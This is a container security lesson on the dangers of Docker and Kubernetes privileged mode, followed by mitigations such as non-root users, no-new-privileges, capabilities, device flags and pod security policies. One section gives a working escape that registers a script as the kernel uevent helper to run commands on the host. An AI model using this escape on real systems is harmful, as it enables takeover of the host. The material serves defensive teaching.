Container is running in privileged mode
A user with root access in a container running in privileged mode is effectively root on the host system
Kubernetes
What is container privileged mode?
By default, container runtimes go to great lengths to shield a container from the host system. Running in --privileged mode disables or bypasses most of these checks. This means that if you are root in a container, you effectively have the privileges of root on the host system. It is only meant for special cases, such as running Docker in Docker, and should otherwise be avoided.
About this lesson
In this lesson, we will show you why running containers in privileged mode is really a bad idea. First, we will show you that root access in a privileged container gives you access to the host filesystem, kernel settings and processes. We will explain alternative configuration options if you need more access than usual. Finally, we will teach you how to configure your Kubernetes code to disable running containers with such settings.
We know it's tempting, but in almost all cases privileged mode is a matter of laziness. Let's see why using it is a bad idea!
What can you do if you have access to a privileged container?
After some careful crafting of a URL request, we manage to get access to a root shell on a remote system (how that's done, I'll leave that for another lesson). We get really excited and start to explore what we can do.
After we get access, we first check if we are inside of a container. Copy and paste the following command into the terminal and hit enter:
cat /proc/1/cgroup
We see the word docker in there so we can confirm we are in a container.
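The check above can be wrapped in a small helper. This is only a sketch: the function name in_container and the list of markers (docker, kubepods, containerd, lxc) are assumptions made for illustration. On hosts that use cgroup v2 the file often contains only `0::/`, so a negative result proves nothing.

```shell
#!/bin/sh
# Heuristic: succeed if the given cgroup file mentions a container runtime.
# The function name and the marker list are illustrative assumptions.
in_container() {
    cgroup_file="${1:-/proc/1/cgroup}"
    [ -r "$cgroup_file" ] || return 1
    grep -Eq 'docker|kubepods|containerd|lxc' "$cgroup_file"
}

if in_container; then
    echo "probably inside a container"
else
    echo "no container marker found (inconclusive on cgroup v2)"
fi
```

Passing a file name as the first argument lets you try the helper against a saved copy of the file instead of the live /proc entry.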
Next thing to check is if we are in a privileged container. A good indicator is that we have access to a lot of devices. Copy and paste the following command into the terminal and hit enter:
ls /dev/
We might also have access to disk devices. We can check this by copying and pasting the following command into the terminal and pressing Enter:
fdisk -l
Now we want to go one step further and execute commands on the host. To achieve this, we register a helper script that the kernel runs whenever a device event (uevent) fires. We can only set this helper because the privileged container has the capability CAP_SYS_ADMIN.
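Before relying on CAP_SYS_ADMIN, it can be confirmed from the effective capability mask in /proc/self/status. The sketch below assumes a Linux /proc filesystem; has_cap is a hypothetical helper name, and the bit number 21 is the value of CAP_SYS_ADMIN in the Linux capability headers.

```shell
#!/bin/sh
# CAP_SYS_ADMIN is capability number 21 in <linux/capability.h>.
CAP_SYS_ADMIN_BIT=21

# has_cap MASK BIT: succeed if bit BIT is set in the hex capability mask.
# (has_cap is a hypothetical helper name, not a standard tool.)
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# Effective capability set of the current process, as a hex string.
mask=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null || true)

if [ -n "$mask" ] && has_cap "$mask" "$CAP_SYS_ADMIN_BIT"; then
    echo "CAP_SYS_ADMIN present: the container may be privileged"
else
    echo "CAP_SYS_ADMIN not in the effective set"
fi
```

A set bit is an indicator rather than proof of privileged mode, since the capability can also be granted individually.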
We find out the overlay filesystem path:
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
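To see what this substitution extracts, it helps to run it on a single line. The mount entry below is invented for illustration (the directory names are not from a real system). The upperdir option of an overlay mount names the host directory that holds the container's writable layer, which is why a file created at / inside the container can be addressed on the host through that path.

```shell
#!/bin/sh
# Hypothetical /etc/mtab entry for an overlay root filesystem (paths invented).
sample='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=/var/lib/docker/overlay2/abc/work 0 0'

# Keep only the value of the upperdir= mount option (everything up to the next comma).
extract_upperdir() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}

host_path=$(printf '%s\n' "$sample" | extract_upperdir)
echo "$host_path"
```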
We install our trigger script that lists all the processes and make it executable.
cat << EOF > /trigger.sh
#!/bin/sh
ps auxf > output.txt
EOF
chmod +x /trigger.sh
Finally, we add our script to the event helper and trigger the change event:
echo "$host_path/trigger.sh" > /sys/kernel/uevent_helper
echo change > /sys/class/mem/null/uevent
And lo and behold... output.txt contains the process list of the host! We can now execute commands on the host system.
To see the output of this, copy and paste the following command into the terminal below:
head output.txt
Privileged mode disables all these checks
It was first introduced as an easier way to debug and to allow for running Docker inside Docker.
Enabling privileged mode (--privileged), as per the official Docker documentation, has the following effects: the --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do. This flag exists to allow special use-cases, like running Docker within Docker.
You can find more detail in this blog post about Docker in Docker by Docker Captain JPetazzo, who submitted this feature.
With privileged mode, root in a container means root on the host
The result of bypassing all these checks is that the root user inside a container has the same access as root on the host system. So we definitely want to avoid running as root in a container that is running in privileged mode.
Avoid running as root user in a container
When a container is given privileged mode it receives all permissions the host has. When running as a regular user this might still be limited, but as root this means having control over the complete host system. Therefore the first mitigation is to avoid running as root in the first place.
root (id = 0) is the default user within a container. The image developer can create additional users. Those users are accessible by name. When passing a numeric ID, the user does not have to exist in the container.
We can set a default user to run the first process with the Dockerfile USER instruction.
But sometimes we don't have control over the image and we download a container image that by default runs as root (for example Ubuntu). When starting a container, we can override the USER instruction by passing the -u (--user) option.
$ docker run -u 1001 -it ubuntu:latest /bin/bash
I have no name!@94f1ded5e4ac:/$ id -a
uid=1001 gid=0(root) groups=0(root)
The prompt shows "I have no name!" because UID 1001 has no entry in the container's /etc/passwd. More importantly, id confirms that the process no longer runs as root (UID 0).
Prevent a user from becoming root user
Even when a container is started as non-root, given the right permissions a user might use sudo and become root. We can block this behavior by using the --security-opt no-new-privileges flag when starting the container.
docker container run --rm -it \
  --user 1001:1001 \
  --security-opt no-new-privileges \
  mycontainer
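From inside the container, the effect of this flag can be checked through the NoNewPrivs field that recent Linux kernels report in /proc/self/status. The following is a sketch under that assumption; no_new_privs_set is a hypothetical helper name.

```shell
#!/bin/sh
# no_new_privs_set [FILE]: succeed if FILE (default /proc/self/status)
# reports NoNewPrivs as 1. The helper name is hypothetical.
no_new_privs_set() {
    status_file="${1:-/proc/self/status}"
    [ -r "$status_file" ] || return 1
    [ "$(awk '/^NoNewPrivs:/ {print $2}' "$status_file")" = "1" ]
}

if no_new_privs_set; then
    echo "no_new_privs is set: setuid binaries such as sudo cannot raise privileges"
else
    echo "no_new_privs is not set (or not reported by this kernel)"
fi
```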
Advanced - Remap container process to a non privileged host user
The user specified on the CLI or in the Dockerfile refers to the user running inside the container. As a container admin, you can change which host users containers run as by using the userns-remap feature. This is transparent to the container: it is tricked into thinking it is still root, while in reality it runs as a different user on the host.
The explanation of this is out of scope, see the Docker documentation on using userns-remap.
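Whether such a remapping is active can be read from /proc/self/uid_map inside the container. The sketch below is an illustration only: root_is_remapped is a hypothetical helper name, and the "outside" UID is the one in the parent user namespace, which is normally the host.

```shell
#!/bin/sh
# root_is_remapped [FILE]: succeed if UID 0 inside the namespace maps to a
# non-zero UID outside it. FILE defaults to /proc/self/uid_map.
# The helper name is hypothetical.
root_is_remapped() {
    map_file="${1:-/proc/self/uid_map}"
    [ -r "$map_file" ] || return 1
    # Each line reads: <first UID inside> <first UID outside> <range length>
    outside=$(awk '$1 == 0 {print $2; exit}' "$map_file")
    [ -n "$outside" ] && [ "$outside" -ne 0 ]
}

if root_is_remapped; then
    echo "root in this container is an unprivileged user outside it"
else
    echo "root in this container maps to UID 0 (or the mapping is unreadable)"
fi
```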
Advanced - Running Docker Daemon in Rootless mode
Rootless mode executes the Docker daemon and containers inside a user namespace. This is very similar to userns-remap mode, except that with userns-remap mode, the daemon itself is running with root privileges, whereas in rootless mode, both the daemon and the container are running without root privileges.
The explanation of this is out of scope, see the docker documentation for more information on running Docker in rootless mode.
Take some time and find the privileges you actually need
It's really tempting to give a container privileged mode, since this takes away the pain of having to find out the real privileges you need. It's the chmod 777 of containers. As we've shown in the In Action section, this is really a bad idea. We encourage you to check the documentation of the container to see which privileges it really needs.
In the next parts we describe a few of the most common cases where we see people resort to privileged mode when a more specific permission would have made it unnecessary. You can check all the options for the Docker runtime on its documentation page.
Use --device to share device access from host to container
When a container needs access to a host device, it's tempting to add privileged mode, yet there is a better solution: to share devices such as disks or serial ports from the host with the container, there is a specific container run flag, --device.
$ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc
Use capabilities to allow listening to port below 1024
Another common case is when you want to start a web server and it says it can't bind to a lower TCP port (say port 80 for HTTP). If a server needs to listen on a port below 1024, we can use Linux capabilities to grant exactly that ability.
Your error might look like:
(13)Permission denied: AH00072: make_sock: could not bind to address [::]:80
Then you can add the capability NET_BIND_SERVICE to the container instead of adding the privileged mode.
$ docker run -it --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE php:apache
For more information on using Linux Capabilities see our other lesson about configuring Container and Linux Capabilities.
Please note that Docker changed this bind behavior in version 20.10, which allows unprivileged processes in a container to bind to lower ports by default. So if you see this error, it is best to check and, if needed, upgrade the container runtime version.
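Whether a given port still needs NET_BIND_SERVICE can be estimated from the kernel's net.ipv4.ip_unprivileged_port_start setting, which newer Linux kernels expose under /proc/sys. The sketch below assumes that setting; port_needs_capability is a hypothetical helper name, and the fallback of 1024 reflects the classic limit on kernels without the setting.

```shell
#!/bin/sh
# port_needs_capability PORT [FILE]: succeed if binding PORT as a non-root
# user would require NET_BIND_SERVICE, judged by the kernel's threshold.
# The helper name is hypothetical.
port_needs_capability() {
    port="$1"
    threshold_file="${2:-/proc/sys/net/ipv4/ip_unprivileged_port_start}"
    # Kernels without this setting use the classic threshold of 1024.
    threshold=1024
    if [ -r "$threshold_file" ]; then
        threshold=$(cat "$threshold_file")
    fi
    [ "$port" -lt "$threshold" ]
}

if port_needs_capability 80; then
    echo "port 80 needs NET_BIND_SERVICE for a non-root process"
else
    echo "port 80 can be bound without extra capabilities"
fi
```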
Seccomp - filesystem permission frustration
Trust us, we've been there: seccomp and related security profiles are not always easy. Sometimes you think you've set up every permission the container needs, but some permission issue remains. When the problem is file access on a mounted volume, note that besides the ro/rw flags, volume mounts also support the z and Z options. Strictly speaking, these relabel the mounted content for SELinux rather than changing seccomp: z marks the content as shared between containers and Z marks it as private to one container. Matt Jarvis has written a more detailed blog on privileged mode and seccomp.
Seccomp outdated - raspberry pi/alpine
There is a known issue with older versions of seccomp and newer versions of the Docker runtime on Alpine systems/Raspbian. This manifests itself, for example, as not being able to run apt update as root in a container. The solution is to update libseccomp to a newer version; sometimes this is not available through your OS updates, so you have to update manually. See https://docs.linuxserver.io/faq for more details.
Even the developers of the popular Home Assistant automation package listed --privileged in their documentation as the recommended way to run their container. The discussion in https://github.com/home-assistant/core/issues/52647 shows it was not really needed.
Enforcing Kubernetes securityContext capability settings
As a Kubernetes admin, you can configure the cluster to enforce securityContext settings. Kubernetes has the PodSecurityPolicy controller built in which allows you to enforce securityContext settings.
More specifically, you can require that users (a) do not use privileged mode, (b) run as non-root and (c) disable any privilege escalation in a container.
- privileged: determines if any container in a pod can enable privileged mode. By default a container is not allowed to access any devices on the host, but a "privileged" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use linux capabilities like manipulating the network stack and accessing devices.
- MustRunAsNonRoot: Requires that the pod be submitted with a non-zero runAsUser or have the USER directive defined (using a numeric UID) in the image. Pods which have specified neither runAsNonRoot nor runAsUser settings will be mutated to set runAsNonRoot=true, thus requiring a defined non-zero numeric USER directive in the container. No default provided. Setting allowPrivilegeEscalation=false is strongly recommended with this strategy.
- AllowPrivilegeEscalation: Gates whether or not a user is allowed to set the security context of a container to allowPrivilegeEscalation=true. This defaults to allowed so as to not break setuid binaries. Setting it to false ensures that no child process of a container can gain more privileges than its parent.
See the Kubernetes documentation for more info.
Please note that PodSecurityPolicy has been deprecated in the v1.21 release and is scheduled for removal in v1.25.
It will eventually be replaced by the new Pod Security Admission feature; however, as of v1.22, it is still in alpha status. Good alternatives are the externally maintained projects Open Policy Agent or Kyverno.
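Whichever admission mechanism enforces them, the three settings end up in the securityContext of each container. The sketch below writes a minimal Pod manifest with those fields and runs a cheap local check on it. The pod name, the image name mycontainer, the UID 1001 and the output path are placeholders chosen for illustration, not values from a real deployment.

```shell
#!/bin/sh
# Write a hypothetical Pod manifest; name, image and UID are placeholders.
manifest="${TMPDIR:-/tmp}/hardened-pod.yaml"
cat > "$manifest" <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: hardened-example
spec:
  containers:
    - name: app
      image: mycontainer
      securityContext:
        privileged: false
        runAsNonRoot: true
        runAsUser: 1001
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
          add: ["NET_BIND_SERVICE"]
EOF

# Local sanity check before handing the file to the cluster,
# for example with: kubectl apply -f "$manifest"
if grep -Eq 'privileged:[[:space:]]*true' "$manifest"; then
    echo "refusing: manifest requests privileged mode" >&2
else
    echo "manifest does not request privileged mode"
fi
```

The grep check only catches the literal setting in this one file; cluster-wide enforcement still belongs in an admission controller.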
Keep learning
To learn more about Kubernetes security, check out our blog posts:
- $fun & $profit - In the example attack, we've shown how we got access to the host filesystem and executed processes on the host system, all while inside the privileged container. For different kinds of attack vectors you can read more about Container Breakouts. Also an honourable mention to _fel1x for capturing the attack code in a single tweet.
- Learn more about Kubernetes Security issues and best practices
- Check out our article on the top 10 Kubernetes Security Context settings you should understand on our blog.